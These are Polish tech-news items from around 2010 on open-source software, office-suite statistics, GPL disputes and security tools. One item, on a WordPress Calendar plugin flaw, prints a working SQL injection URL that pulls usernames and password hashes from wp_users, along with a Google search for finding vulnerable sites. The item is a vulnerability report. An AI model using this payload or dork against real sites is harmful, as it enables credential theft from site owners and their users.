Duński Parlament podjął decyzję, że od kwietnia 2011 instytucje rządowe będą używać otwartych formatów do oficjalnej komunikacji. Oznacza to m.in., że oficjalne dokumenty będą przesyłane w formatach ODF (Open Document Format). Jest to rezultat porozumienia z grudnia 2007 roku.

Po trwającej ponad cztery lata debacie Parlament Danii podjął decyzję o użyciu otwartych formatów do oficjalnej komunikacji pomiędzy instytucjami rządowymi. W ten oto sposób formaty XLS, DOC i PPT zostaną zastąpione przez ich otwarte odpowiedniki – ODS, ODT i ODP. Oznacza to, że jeśli Microsoft nie poprawi obsługi wolnych standardów, to Rząd Danii przestanie z nim robić interesy!

Decyzja nie oznacza automatycznego przejścia na oprogramowanie open source, aczkolwiek daje mu dużą szansę. Oprócz darmowego Sun OpenOffice.org otwarte formaty wspierane są przez inne, komercyjne pakiety biurowe, np. Corel Word Perfect Office.

Helge Sander, duński minister nauki chce, aby w przyszłości komunikacja odbywała się wyłącznie za pomocą otwartych standardów. Wierzy on, że są one lepsze niż opatentowane standardy, z których obecnie korzysta się na szeroką skalę.

Choć decyzja dotyczy wyłącznie instytucji państwowych, to najprawdopodobniej pociągnie to za sobą przejście na otwarte standardy również instytucji regionalnych.

News pierwotnie opublikowany pod adresem http://bit-tech.net.pl/rzad-danii-przechodzi-na-otwarte-formaty

Zespół KDE Web udostępnił dziś całkowicie przeprojektowaną witrynę www.kde.org. Wydarzenie ma miejsce niedługo przed premierą oczekiwanego pulpitu, platformy KDE 4.4 oraz nowego zestawu aplikacji.

Nowa witryna jest owocem wielu godzin pracy artystów, programistów, autorów tekstów oraz testerów. Idea została zainicjowana przez podczas spotkania marketingowego KDE.

W ramach zmian, pojawiła się też nowa wersja strony z nowościami na temat KDE dostępnymi w czasie rzeczywistym: buzz.kde.org.

Szczegóły na dot.kde.org (ang.)

W ostatnim czasie opublikowane zostały informacje na temat dwóch interesujących luk obecnych w przeglądarce internetowej Opera oraz systemie operacyjnym Solaris. Specjaliści zajmujący się badaniem bezpieczeństwa aplikacji oraz systemów operacyjnych opublikowali w obu przypadkach kod Proof of Concept, pozwalający na przetestowanie podatności własnych systemów na potencjalny atak typu Denial of Service.

Luka obecna w przeglądarce Opera 10.10 pozwala na awaryjne zakończenie pracy programu oraz zdalne wykonanie dowolnego kodu. Haker ukrywający się pod pseudonimem Cr4wl3r opublikował szczegółowy opis wykorzystanej podatności wraz z odpowiednim kodem Proof of Concept. Opublikowany exploit wykorzystuje specjalnie spreparowaną funkcję JavaScript (alert). Co najciekawsze, wspomniany błąd występował już w Operze w wersji 9.10.

Natomiast luka związana z błędem dereferencji wskaźnika pustego (NULL) w funkcji ucode_get_rev pozwala na awaryjne zakończenie pracy systemu operacyjnego Solaris/Open Solaris. Patroklos Argyroudis opublikował szczegółowy opis luki oznaczonej jako CVE-2010-0453 wraz z odpowiednim kodem Proof of Concept.

Przedstawione przykłady pokazują wyraźnie, że niezależnie od rodzaju używanej przeglądarki internetowej oraz systemu operacyjnego, nigdy nie możemy liczyć na w pełni bezpieczną oraz stabilną pracę.

Materiał pochodzi z serwisu HARD CORE SECURITY LAB.

Pojawiła się nowa wersja Irrlicht, otwartego silnika gier  3D dostępnego dla Windows, MacOS X, Linuksa, Windows CE oraz posiadającego porty dla innych platform (Xbox, PlayStation Portable, Symbian, iPhone). Nowe wydanie przynosi wiele nowości oraz poprawki błędów.

Irrlicht został napisany w C++ i posiada wsparcie dla OpenGL jak i własnego, programowego systemu renderowania. Używany jest w grach, demach, a także do renderowania obiektów 3D w aplikacjach CAD.

Nowości w wydaniu 1.7 to między innymi:

• obsługa MRT;
• możliwość użycia animacji w formacie Ogre .mesh;
• obsługa architektury NPK Nebula.
• nowe opcje rysowania w trybie 2D;
• obsługa szyfrowania z użyciem algorytmu AES;
• możliwość użycia VBO dla kopuł nieba i podobnych obiektów;
• obsługa kompresji Bzip2 oraz LZMA.

Pełna lista zmian.
Pobierz nową wersję.

Komunikator Kadu 0.6.5.4 ze wsparciem dla sieci gadu-gadu 8 i 10 został dziś wydany. Najważniejsze zmiany, które są częścią tego wydania: długie opisy z możliwością wpisania do 255 znaków, nowe statusy “Chętny do rozmowy” oraz “Nie przeszkadzać”, możliwość kontaktu z użytkownikami z nowej puli numerów dla sieci gadu-gadu (tzw. długie numery), naprawione zostało wysyłanie obrazków naprawione zostało wysyłanie smsów przez bramkę Plus GSM.

Pakiety instalacyjne komunikatora Kadu dostępne są dla Linuksa, Mac OS X i Windowsa w dziale Pobierz.

Pakiety instalacyjne dla Linuksa dostępne są już dziś dla dystrybucji: Ubuntu, Debian, openSUSE i Mandriva, pozostałe dystrybucje będą dostępne wkrótce.

Pozostałe wybrane usprawnienia w tej wersji:

• zostało dodane wsparcie dla systemu Maemo (Nokia N900) i
  zaawansowani użytkownicy mogą skompilować Kadu na Maemo
• wszelkie komunikaty są wyświetlane teraz na środku ekranu a
  nie w jego lewym górnym rogu
• została zwiększona czytelność okna wyboru emotek
• został dodany nowy moduł Single_window – lista kontaktów i
  rozmowy w jednym oknie
• po otwarciu okna “Rozpocznij rozmowę z…” focus ustawia się
  automatycznie w polu tekstowym
• zostało naprawione działanie modułu Profiles pod Mac OS X.
• Poprawiony został błąd w pozycjonowaniu okna rozmowy z nową
  osobą pod Windows
• naprawione zostało wykrywanie zestawów ikon, emotek i dźwięków
  w ścieżce użytkownika dla systemu Windows
• historia otwiera się z powrotem na ostatniej rozmowie z
  kontaktem, wyszukiwanie w historii rozpoczyna się od aktualnie
  przeglądanego dnia
• dodany został nowy moduły – Dbus oraz pajacyk
• zawijanie zbyt długich słów w oknie rozmowy
• moduł Spellchecker skorzysta z Enchant zamiast Aspell’a jeśli
  znajduje się on w systemie
• Kodowanie w UTF8 dla wysyłanych i odbieranych wiadomości,
  wyszukiwania kontaktów w katalogu publicznym oraz ustawianych opisów

Pełna lista poprawek znajduje się tutaj.  Pobierz nową wersję komunikatora Kadu.

Dla osób zainteresowanych rozwojem Kadu w tym następnej wersji z obsługą sieci komunikacyjnych  XMPP/Jabber i Tlena śledzić rozwój Kadu można za pomocą:

• RSSów
• Blipa ^kadu (ale tylko wtedy gdy “Pan Oponka” ma wolne…)
• Bloga http://kadu-im.blogspot.com/ (po angielsku) 
• i oczywiście forum Kadu, gdzie można przyłączyć się do rozwoju tego komunikatora

3 dni temu, świat obiegła informacja o sukcesie pakietu OpenOffice, który u naszych sąsiadów zza Odry, jest już zainstalowany na 21,5% komputerów. W międzyczasie, serwis Webmasterpro uwzględniając użytkowników z całego świata, opracowywał całkowicie nową statystykę, z której wyłania się obraz Polski, właśnie jako lidera wśród krajów wdrażających ten otwarty pakiet biurowy.

Metodologia nowszego badania, dużo się nie różniła od poprzedniego. Dzięki analizatorowi serwisu FlashCounter, przeszukano zasoby systemowych fontów, odnajdując te charakterystyczne dla danego pakietu.

Dla OpenOffice będzie to przykładowo OpenSymbol, a dla MS Office będzie to np. Calibri. Aktualne badanie swoim zasięgiem objęło grupę ponad dwustu tysięcy użytkowników na świecie.

Z badania wynika, że poziom wdrożeń w Polsce jest nie tylko bardziej zaawansowany, ale także mniej lubimy produkt Microsoftu. OpenOffice jest u nas zainstalowany na 22% komputerów, a MS Office jedynie na 68%. Drugie miejsce przypadło naszym przyjaciołom z Czech, którzy osiągnęli dokładnie ten sam procent instalacji, jednak popularność Microsoft Office’a jest u nich znacznie wyższa i sięga aż 76%. Niemcy uplasowały się dopiero na trzecim miejscu, sięgając kolejno 21% i 72%.

Statystyki dla Microsoftu mogą okazać się nazbyt optymistyczną pułapką. Wiele fałszywych zaliczeń na korzyść giganta, może wynikać z popularnego procederu dystrybutorów sprzętu, którzy chętnie instalują kilkudziesięciodniowe wersji próbne pakietu. Inną przyczyną “fałszywego punktu” może być fakt instalacji charakterystycznych fontów przez programy typu PowerPoint 2007 Viewer. Także na fali euforii i zachwytu nową wersją “2007″, wielu użytkowników wyodrębniało same fonty, które są niewątpliwym sukcesem Microsoftu.

W badaniu uwzględniono także pakiety Corel WordPerfect i Apple iWorks, a także SoftMaker Office i KOffice. Niestety suma instalacji dwóch ostatnich sięgnęła jedynie 0,3%, przez co te dwa pakiety nie znalazły się w zestawieniu. Pod skrótem “OpenOffice” kryje się
oryginalny OpenOffice.org, Lotus Symphony, StarOffice, NeoOffice i inne mniej popularne edycje. Tak szerokie spektrum różnych odmian jest także dowodem na istnienie potrzeby dostępu do otwartych źródeł. Pozwala to dostosować ten sam pakiet do wymagań różnych odbiorców, uwzględniając interfejs czy architekturę komputera.

No dokładkę warto dodać, że statystyka w ogóle nie objęła Danii, która 1 stycznia br., przyjęła prawo, na mocy którego domyślnym formatem wymiany danych jest OpenDocument. Jak widać, można propagować wolność technologiczną i nie wiązać się z OpenOffice.

Aktualizacja: Uzupełnienie niusa na blogu KDE: Polska liderem w użytkowniu OpenOffice.org

Nikto to otwarty (Open Source – GPL) skaner umożliwiający automatyczne wykrywanie luk w zabezpieczeniach serwerów Web. Nikto jest w stanie wykryć rodzaj serwera, ocenić jego aktualność oraz podatność na tysiące znanych zagrożeń. Z pewnością warto za pomocą tego narzędzia przeskanować własny serwer WWW i przeanalizować dokładnie wyniki.

O tym doskonałym narzędziu, niezwykle przydatnym do testowania bezpieczeństwa własnych serwerów, przypominam przy okazji premiery wersji 2.1.1. Nowa wersja wprowadza szereg niedostępnych do tej pory funkcji, takich jak:

• wykrywanie podatności na szereg nowych ataków typu RFI (ang. Remote File Inclusion),
• możliwość uniknięcia wykrycia przeprowadzanych testów przez systemy IDS z wykorzystaniem biblioteki Libwhisker 2.5,
• możliwość dołączania wtyczek.

Program w najnowszej wersji można pobrać pod tym adresem. Tutaj natomiast znajduje się obszerna instrukcja użytkownika.

Tyle informacji teoretycznych, teraz zapoznajmy się z praktycznymi możliwościami Nikto. Za pomocą prostego polecenia ./nikto.pl –h adres_ip_serwera uruchomimy domyślne skanowanie (poniżej przykładowy wynik skanowania).

Na powyższym zrzucie ekranu widać wyraźnie, że skaner wykrył w docelowym systemie szereg luk. Nikto nie ogranicza się jednak wyłącznie do wykrycia zagrożeń. Otrzymujemy również zalecenia (takie jak zalecenia przeprowadzenia aktualizacji oprogramowania) oraz linki do stron opisujących wykryte podatności. Zachęcam więc wszystkich do testowania własnych serwerów, zanim zrobią to za nas crackerzy!

Materiał pochodzi z serwisu HARD CORE SECURITY LAB.

Mozilla ostrzegła na swym blogu wszystkich użytkowników przeglądarki Firefox o dwóch zainfekowanych trojanami dodatkach, które to zostały udostępnione na stronie addons.mozilla.org!

Zgodnie z ostrzeżeniem, dodatek Master Filer zawierał specjalizującego się w wykradaniu haseł trojana LdPinch, natomiast Sothink Web Video Downloader w wersji 4.0 był zainfekowany trojanem Bifrose.

Z opublikowanego komunikatu wynika, że oba dodatki zostały do czasu odkrycia zagrożenia pobrane przez sporą grupę użytkowników:

Master Filer was downloaded approximately 600 times between September 2009 and January 2010. Version 4.0 of Sothink Web Video Downloader was downloaded approximately 4,000 times between February 2008 and May 2008. Master Filer was removed from AMO on January 25, 2010 and Version 4.0 of Sothink Web Video Downloader was removed from AMO on February 2, 2010.

W związku z zaistniałą sytuacją, Mozilla jednocześnie zapewnia, że rutynowa kontrola antywirusowa wszystkich dodatków została rozbudowana o dwa kolejne narzędzia detekcyjne.

Wniosek z całej sytuacji jest prosty. Nie ufajmy temu, że ktoś zadba o nasze bezpieczeństwo za nas. Pamiętajmy jednocześnie, że w razie jakichkolwiek wątpliwości, możemy w stosunkowo prosty sposób przetestować dany plik na obecność dowolnego złośliwego oprogramowania z pomocą darmowych usług dostępnych online.

Materiał pochodzi z serwisu HARD CORE SECURITY LAB.

Dziś została wydana kolejna Alpha popularnego programu do obsługi protokołu Gadu-Gadu. Jak zwykle wiele poprawek i nowości, a między innymi upload awatarów oraz poprawki w XMPP.

W kolejnym wydaniu dodano upload awatarów dla Gadu-Gadu, dodano także zapisywanie i wyświetlanie SMS-ów w historii. Dostępny jest też nowy moduł server_monitor (dla sieci Gadu-Gadu). Poza tym wiele poprawek w notyfikacjach i wywrotkach XMPP/Jabber, usprawniono obsługę stylów Adium.

Clang, projekt tworzący razem z LLVM alternatywę dla GCC, stał się self-hosted.

Niepisaną tradycją wśród twórców kompilatorów jest umożliwienie skompilowania ich przy pomocy ich samych.  Przykładowo, kompilator języka C powinien być w stanie skompilować swój własny kod źródłowy, oczywiście napisany w C.  Kompilator, który to potrafi, określa się – z braku polskiego odpowiednika – jako ’self-hosted’.

Clang to frontend (część kompilatora odpowiedzialna za “przetłumaczenie” kodu w używanym przez programistę języku programowania na postać używaną wewnętrznie przez kompilator) dla LLVM, dostarczającego backend (część kompilatora odpowiedzialną za optymalizacje i wygenerowanie kodu dającego się uruchomić na procesorze).  Razem tworzą alternatywę dla GCC, różniącą się od niego modularnościa (dzięki której możliwe jest tworzenie opartych o niego narzędzi do statycznej analizy kodu lub modyfikujących kod źródłowy), lepszą organizacją kodu (co pozwala na optymalizacje, które w GCC byłyby dużo trudniejsze) oraz liberalną licencją BSD-like.  Rozwój Clanga i LLVM jest finansowany głównie przez Apple, które zatrudnia w tym celu kilkanaście osób.

Począwszy od ostatniego wydania Clang posiadal pełne, produkcyjne wsparcie dla języków C i Objective-C.  Jednak sam Clang, podobnie jak LLVM, napisany jest w C++, dla którego wsparcie nadal jest rozwijane.  Sceptycy twierdzili, że doprowadzenie wsparcia dla C++ do jakiejkolwiek używalności zajmie kilka lat.

Wczoraj projekt osiągnął kolejny milestone – zamknięty został ticket 5221; co oznacza, że wersja Clanga i LLVM skompilowana nim samym przechodzi wszystkie testy regresji.  Kolejne otwarte zadania to m.in. kompilacja niezmodyfikowanych źródeł Firefoksa.

Pierwszego lutego 2010 r. ukazał się test i przegląd zmian w kodzie ze stycznia, otwartoźródłowego projektu Haiku, mającego na celu stworzenie systemu operacyjnego, wzorowanego na BeOS i kompatybilnego z nim binarnie.

Dobrą nowiną jest fakt, że w styczniu wykonano o sto zmian w kodzie więcej tj. 537, niż w grudniu. Pracowano m.in. nad sterownikami, implementacją obsługi zabezpieczeń WEP
i WPA dla kart intela, aplikacjami, obsługą systemu plików NetFS i standardu IEEE 802.11, poprawiono także wiele błędów związanych z  wielowątkowością systemu, więcej szczegółów można znaleźć na podstronie portalu MyHAIKU.

Wspomniany artykuł zawiera także test i wrażenie z użytkowania najnowszych rewizji systemu, tzw. nightly builds. Autor sprawdzał działanie systemu na dwóch komputerach Benq Joybook P52EG i EeePC 901, oraz na maszynie wirtualnej VirtualBox  v.3.1.2. Na jednym z komputerów Haiku nie działał poprawnie, ale należy mieć na uwadze, że system jest dopiero w wersji alpha. Pomimo pewnych trudności, obecne prace dobrze rokują na przyszłość. Istnieje nadzieja, że jeszcze w tym roku ujrzymy wersję R1, która pozwoli na stabilną pracę w Haiku.

Rozwijana od 10 lat platforma Symbian jest od dziś w pełni otwartym oprogramowaniem. Kod źródłowy zostanie udostępniony bez opłat. Symbian Foundation twierdzi iż jest to największe przejście z zamkniętego oprogramowania na otwarte w dotychczasowej historii.

Symbian, który napędza większość telefonów Nokii, do tej pory został zainstalowany na ponad 330 milionach urządzeń. W 2008 roku Nokia, jeden z największych odbiorców Symbiana, przejęła większościowy pakiet udziałów w firmie Symbian Ltd. Następnie utworzyła Fundację Symbiana, której głównym celem jest dystrybucja Symbiana jako projekt open source. Tego samego roku rozpoczął się proces uwalniania kodu źródłowego platformy.

Dzisiejsze pełne otwarcie kodu Symbiana jest bardzo istotnym ruchem w wojnie mobilnych systemów operacyjnych. Jest on aktualnie jedynym w pełni otwartym mobilnym systemem z pośród wielkiej trójki (Symbian, iPhoneOS, Windows Mobile).

Warto także zauważyć iż zyskujący ostatnio popularność system Android ma jedynie 1/3 kodu udostępnioną na otwartej licencji.

Serwis Ars Technica przyjrzał się ostatnim zmianom w rozwojowej wersji stworzonego w ramach projektu GNU programu do obróbki grafiki rastrowej, znanego szerzej jako GIMP. Artykuł został poświęcony opisowi nowego trybu jednego okna, ale można w nim znaleźć także inne informacje na temat ważnych zmian zachodzących w rozwojowej gałęzi 2.7, która da początek stabilnej serii 2.8.

GIMP był od wielu lat często krytykowany za, według niektórych, mało intuicyjny i nieprzyjazny interfejs użytkownika. Jego słabością jest według nich to, że aplikacja ta tworzy bardzo wiele okien oraz pływających paneli, które często bardzo trudno jest sensownie zorganizować. Argument ten jednak można już powoli odkładać do lamusa dzięki nowemu trybowi jednego okna, który zagościł już w gałęzi rozwojowej projektu.

W tym trybie wszystkie panele są domyślnie połączone w jednym oknie (istnieje możliwość zmiany ich położenia, poza główną paletą narzędzi), natomiast zamiast oddzielnych okien dla każdego obrazu otrzymujemy interfejs dla wielu dokumentów, w którym każdy otwarty obraz posiada jedną kartę. Pasek kart posiada typową funkcjonalność dla tego typu kontrolek, a każdy obraz jest reprezentowany przez miniaturkę, aktualizowaną podczas jego edycji.

Nowy tryb można uaktywnić przez menu Okna. Prace nad tą nową koncepcją interfejsu programu nie zostały jeszcze ukończone, co widać po pewnych niedoróbkach, takich jak zbędne kontrolki zmiany rozmiaru okna wyświetlane na niektórych panelach lub problemy z paskiem kart gdy otwartych jest wiele obrazów.

Po dodaniu nowego trybu deweloperzy nie porzucają jednak prac nad trybem wielu okien, który wzbogacił się między innymi o nowe możliwości łączenia kilku paneli w jedno okno. Teraz można je ustawiać także jeden obok drugiego, a nie tylko układać warstwami. Ponadto wprowadzono kilka ulepszeń do biblioteki GEGL (np. możliwość bezpośredniej edycji tekstu na płótnie), a także rozdzielono część funkcji zapisu obrazków do oddzielnej opcji eksportu.

Wydanie pierwszej stabilnej wersji z serii 2.8 jest wstępnie planowane na koniec tego roku.

Serwis Webmasterpro opublikował statystyki wykorzystania pakietów biurowych w Niemczech. Liderem jest Microsoft Office z 72% udziału. OpenOffice.org ma już jednak 21,5% i rośnie.

Twórcy raportu wykorzystali ciekawą metodę zbierania danych o wykorzystywanych pakietach biurowych. Nie korzystano ze statystyk sprzedaży (trudne do zanalizowania w przypadku wolnego oprogramowania) ani ankiet, lecz zanalizowano dostępność specyficznych fontów na komputerach łączących się z Internetem. Każdy z pakietów zawiera unikalne fonty niedostępne w innych aplikacjach. Ich analiza pozwala na dość dokładne stwierdzenie czy na danym komputerze zainstalowany jest dany pakiet.

Co ciekawe, autorzy raportu nie zauważyli różnic między użytkownikami domowymi i biznesowymi, co pokazuje, że wykorzystanie OpenOffice.org w firmach i w celach prywatnych jest bardzo podobne.

Oczywiście metoda z fontami nie jest idealna. Fonty mogą zostać w systemie mimo nie wykorzystywania już danego pakietu. W przypadku Microsoft Office statystyki zawyżać mogą też darmowe wersje ewaluacyjne pakietu, które wygasają po 60 dniach od zakupu komputera.

Tak czy inaczej, raport mówi sporo o wykorzystaniu pakietów biurowych u naszych zachodnich sąsiadów i dowodzi, że pakiety alternatywne do wiodącego mają się coraz lepiej.

Twórcy oprogramowania do pierwszego polskiego czytnika e-booków o nazwie eClicto (dystrybuowanego w sieci Kolporter) nie chcą udostępnić w sposób nieograniczony kodu źródłowego do systemu urządzenia. Jest on oparty na Linuksie, którego licencja (GPL) wymaga, by kod źródłowy wszelkich jego modyfikacji został udostępniony i to bez żadnych ograniczeń.

O sprawie pierwszy doniósł serwis eKsiazki.org. Był też artykuł na łamach OSnews. Kolporter ponoć godzi się na udostępnienie kodu źródłowego wyłącznie w bardzo ograniczonym zakresie. Do tego odpłatnie, bo twierdzi, że wgląd do niego wymaga poświęcenia czasu przez pracownika firmy. Kod źródłowy można będzie bowiem obejrzeć na indywidualną prośbę tylko osobiście w siedzibie firmy. Chętnemu zostanie on po prostu wyświetlony na ekranie komputera.

Takie rozwiązanie jest co najmniej wątpliwe prawnie. Oprogramowanie eClicto powstało na bazie systemu Linux, który należy do tzw. otwartego oprogramowania i jest oparty o licencję GPL. Pozwala ona programistom na swobodne korzystanie z kodu źródłowego oprogramowania, w tym na jego modyfikację i wykorzystanie również w celach komercyjnych pod warunkiem jednak, że otrzymany w ten sposób („nowy”) program zostanie udostępniony również na warunkach tej samej licencji GPL.

Oznacza to, że należy opublikować kod źródłowy zmodyfikowanego programu wraz z listą dokonanych zmian w stosunku do „oryginalnego” kodu. Co więcej, udostępnienie zmienionego kodu powinno nastąpić bezpłatnie. Ewentualnie modyfikujący może pobierać jedynie opłatę równoważną kosztom przygotowania nośnika (ust. 2 lit. “b” licencji).

W świetle tych postanowień, utrudnienie dostępu do kodu, które wprowadza Kolporter, zasłaniając się przy tym względami bezpieczeństwa, wykracza poza zakres licencji i może zostać uznane za jej naruszenie. GPL nie przewiduje bowiem od przedstawionych zasad żadnych wyjątków. W szczególności nie przewiduje możliwości powołania się na „względy bezpieczeństwa”, jak to czyni Kolporter (wtedy przecież praktycznie każdy kod można by właściwie zamknąć i utajnić – na wszelki wypadek).

Wątpliwości prawne budzi nie tyle nawet sam fakt deklaracji wprowadzenia opłat (jeżeli założymy, że ich wysokość będzie adekwatnym odpowiednikiem kosztów przygotowania nośnika), co sytuacja, w której programista nie może swobodnie dostać kodu źródłowego w formie elektronicznej “do ręki”. Taki bowiem jest sens wymogu udostępnienia tego kodu, jaki wprowadza licencja GPL. Chodzi przecież o to, żeby programista mógł sobie ten kod dowolnie dalej zmodyfikować, tak jak mógł to zrobić wydawca oprogramowania opartego na innym programie open source (w omawianej sytuacji Linuksie). Tymczasem jaki sens jest przeglądanie przez zainteresowanego kilometrowych listingów na ekranie?

W związku z dużymi kontrowersjami, które wywołało postępowanie Kolportera, firma dziś złożyła na łamach wspomnianego na wstępie serwisu e-bookowego następujące oświadczenie:

Kielce, 2010-02-02

Oświadczenie Kolportera Info w sprawie przestrzegania standardów GPL

W związku z pytaniami oraz pojawiającymi się informacjami dotyczącymi rzekomego naruszania przez Kolportera Info standardów GPL oświadczamy:

Sprawa upowszechnienia kodu źródłowego oprogramowania w projekcie eClicto ma na gruncie polskiego prawa charakter całkowicie precedensowy. Postanowienia dotyczące licencji GPL są bardzo złożone, a ich interpretacje prawne w kontekście polskiego prawa autorskiego niejednoznaczne.

Po przeprowadzeniu wnikliwej analizy prawnicy Kolportera Info uważają, że nasza firma nie łamie prawa. Jednak konsekwentnie realizując politykę otwartości i biorąc pod uwagę głosy internautów, postanowiliśmy się zwrócić do zewnętrznej, renomowanej kancelarii prawnej o przygotowanie niezależnej opinii w tej sprawie.

Jeżeli ekspertyza ta potwierdzi, że spółka Kolporter Info jest zobowiązana do upublicznienia kodu źródłowego eClicto, wskazane elementy zostaną udostępnione wszystkim zainteresowanym.

Podkreślamy, że nasza firma zawsze przestrzegała i przestrzega obowiązujących standardów prawnych, dlatego też do czasu pełnego wyjaśnienia tej sprawy apelujemy o powściągliwość w ocenach.

Maciej Topolski
Rzecznik Prasowy
Grupy Kapitałowej Kolporter

Moim zdaniem to ewidentne granie na czas a Kolporter doskonale wie, że nie ma racji. Warto w tym miejscu wspomnieć, że pod koniec lata zeszłego roku moc prawną licencji GPL potwierdził francuski sąd. Nie była to jednak pierwsza sytuacja, w której sąd europejskiego kraju potwierdził prawne znaczenie licencji GPL. W roku 2007 niemiecki sąd uznał, że naruszenia warunków licencji dopuściła się firma Skype. Producent znanego komunikatora chciał apelować, ale wycofał się z tych planów. Jeszcze wcześniej, w roku 2006, zapadł pierwszy tego typu wyrok przeciwko firmie D-Link. W USA było kilka innych sporów zakończonych ugodą, ostatni dotyczył oddziału firmy Cisco.

Google oficjalnie rozpoczęło kampanię łatania przeglądarek Google Chrome i Chromium . Za znalezione w tych przeglądarkach błędy oraz ich zgłoszenie będzie przyznawana jednorazowa nagroda w wysokości do 1337 $ (sic!).

Eksperymentalna inicjatywa firmy skierowana jest do ludzi spoza Google. To powinno ucieszyć wielu, którzy aktywnie wspierają swoje ulubione przeglądarki : znajdują w nich poważne luki, na które poświęcają wiele godzin swojego czasu i jednocześnie nie otrzymując w zamian nawet centa. W zasadzie żaden z większych producentów (Sun Microsystems, Apple, Microsoft czy też Oracle) nigdy nie wynagrodziło takiego pomocnego człowieka, choć dzięki takim jak oni -  ich produkty zostały poprawione.

O tym jak drogie jest odnajdowanie luk w oprogramowaniu najlepiej wie Microsoft. Błędy w przeglądarce Internet Explorer kosztowały tę firmę na pewno wiele tysięcy dolarów oraz utratę reputacji. Gdyby tylko ludzie hobbystycznie testujący bezpieczeństwo programów mieli dodatkową zachętę, to być może udałoby się tego uniknąć.

Z podobnego programu z pewnością skorzystałoby m.in. Adobe (bug Zero Day).

W chwili obecnej tylko nieliczni oferują nagrody za znalezione luki w bezpieczeństwie programów. Wśród nich prym wiedzie Mozilla Firefox.

Standardową nagrodą od Google za znaleziony błąd będzie 500$, lecz niektóre z nich będą warte nawet 1337$ (liczba 1337 jest często używana w znaczeniu leet, co wywodzi się od słowa elite).

źródło informacji : Bit-Tech.

Powstanie projektu Arch Hurd, przygotowania do konferencji FOSDEM, praca naukowa o technologii Mobile Objects w systemie Hurd.

W ostatnim miesiącu ukazała się pierwsza działająca wersja systemu Arch GNU/Hurd, kolejnej — obok Debiana — dystrybucji Hurda. Już teraz projekt Arch Hurd udostępnia 66% oprogramowania dostępnego w debianowym wydaniu Hurda.

Projekt Hurd zorganizował spotkanie w trakcie konferencji FOSDEM, która odbędzie się w dniach 6-7 lutego w Brukseli. W spotkaniu udział weźmie ośmiu deweloperów Hurda, sześciu z nich spotka się również z ludźmi z FSF Europe. Drugiego dnia konferencji Olaf Buddenhagen przedstawi dwie prezentacje w ramach Alt-OS Devroom: Dlaczego ludzie wciąż tworzą Hurda? (o 10:30) oraz Portowanie sterowników grafiki KGI z Linuksa do GNU Hurda (o 13:00).

Carl Fredrik Hammar napisał oraz złożył, a następnie obronił z wyróżnieniem, dysertację pt. Generalizing mobility for the Hurd, w której opisał wykorzystanie technologii Mobile Objects w Hurdzie. W streszczeniu pracy czytamy:

The GNU Hurd features mobile objects in its implementation of filesystem backing stores. This thesis investigates the limitations and security concerns these objects present, and how they can be overcome. This is done in preparation for new applications that feature mobile code and mobile objects. In addition, one such application is studied and implemented, in which mobile code is used to make the ioctl system call more extensible.

Grupa hakerów określająca się mianem Sec Attack Team opublikował dziś szczegółowe informacje dotyczące luki odkrytej we wtyczce WordPress Calendar. Znaleziony błąd pozwala na wykonanie ataku typu Sql Injection i w konsekwencji nieuprawniony dostęp do bazy danych.

Libańska grupa Sec Attack Team przedstawiła następujące możliwości wykorzystania podatności wtyczki:

• www.site.com/?event_id=[kod Sql]
• www.site.com/Path/?event_id=[kod Sql]

Sam kod pozwalający na wyciągnięcie z bazy danych informacji o poświadczeniach użytkowników wygląda następująco:

null+and+1=2+union+select 1,concat(user_login,0×3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

Przykładowy atak może więc przyjąć postać następującego odwołania do serwisu internetowego:

http://server/calendar?event_id=-27+union+select+ 1,concat(user_login,0×3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

Warto również nadmienić, że do odnalezienia witryn podatnych na ten konkretny atak może posłużyć odpowiednio skonstruowane zapytanie do wyszukiwarki Google, w postaci “powered by WordPress” inurl:”/?event_id=”. Zapytanie takie zwraca na chwilę obecną 2240 wyników.

Materiał pochodzi z serwisu HARD CORE SECURITY LAB.

Pojawiła się pierwsza beta długo wyczekiwanego portu popularnej aplikacji do nagrywania (i nie tylko) płyt CD / DVD / Blu-ray, szerzej znanej jako K3B. Wydanie to zbliża nas do planowanego na koniec lutego udostępnienia wersji finalnej.

Wydanie pierwszej bety poprzedziły cztery wersje alfa, ostatnia pojawiła się dwa miesiące temu. Znaczne przyśpieszenie prac jest zasługą głównie polskiego dewelopera, Michała Małka. Warto przypomnieć, że autor i główny deweloper K3B, Sebastian Trüg, jest obecnie zajęty pracami nad projektem NEPOMUK.

Główne zmiany względem wersji alfa 4:

• dodana obsługa Blu-ray;
• zestaw Oxygen został uzupełniony o brakujące ikony;
• bardzo wiele poprawek błędów.

Wydanie to ma być ostatnim testowym przed udostępnieniem wersji stabilnej. Na odważnych testerów czeka między innymi dodana obsługa formatu Blu-ray.

Pobierz wersję testową.

Jeden z najpopularniejszych darmowych snifferów sieciowych doczekał się wydania w wersji 1.2.6. Nowa wersja rozwiązuje szereg problemów odnalezionych w wersjach wcześniejszych oraz wprowadza kilka usprawnień.

Wireshark, znany wcześniej jako Ethereal, umożliwia przede wszystkim zaawansowaną i dogłębną analizę przechwytywanego w czasie rzeczywistym lub też zapisanego uprzednio ruchu sieciowego. Warto wspomnieć, że Wireshark może również posłużyć crackerom do przechwytywania haseł przesyłanych za pomocą nieszyfrowanych protokołów. Jedną z głównych zalet tego darmowego oraz otwartego (licencja GNU GPL) oprogramowania rozwijanego przez The Wireshark Foundation jest przejrzysty graficzny interfejs użytkownika.

Stabilne wydanie 1.2.6 poza naprawą kilkunastu błędów obecnych w wersjach poprzednich przynosi również:

• implementację kilku funkcji niedostępnych do tej pory w wersji sniffera Wireshark przeznaczonej dla 64-bitowych systemów Windows
• szereg usprawnień w obsłudze następujących protokołów: BJNP, BOOTP/DHCP, DHCPv6, FIP, GPRS LLC, IEEE 802.11, IP, Kerberos, OPCUA, SCTP, SSL oraz ZRTP

Więcej informacji na temat najnowszego wydania można odnaleźć tutaj. Sam program można natomiast pobrać pod tym adresem. Przed przystąpieniem do pracy z programem warto również zapoznać się z instrukcją użytkownika.

Materiał pochodzi z serwisu HARD CORE SECURITY LAB.

eClicto to polski czytnik e-booków stworzony przez Kolportera z zamysłem przejęcia naszego rynku jeszcze przed inwazją amerykańskiego Amazon Kindle i konkurencyjnych do niego Nooka i Sony Readera. Niestety, jak się okazuje, mimo że czytnik bazuje na Linuksie, twórcy nie są skorzy do podzielenia się kodem źródłowym.

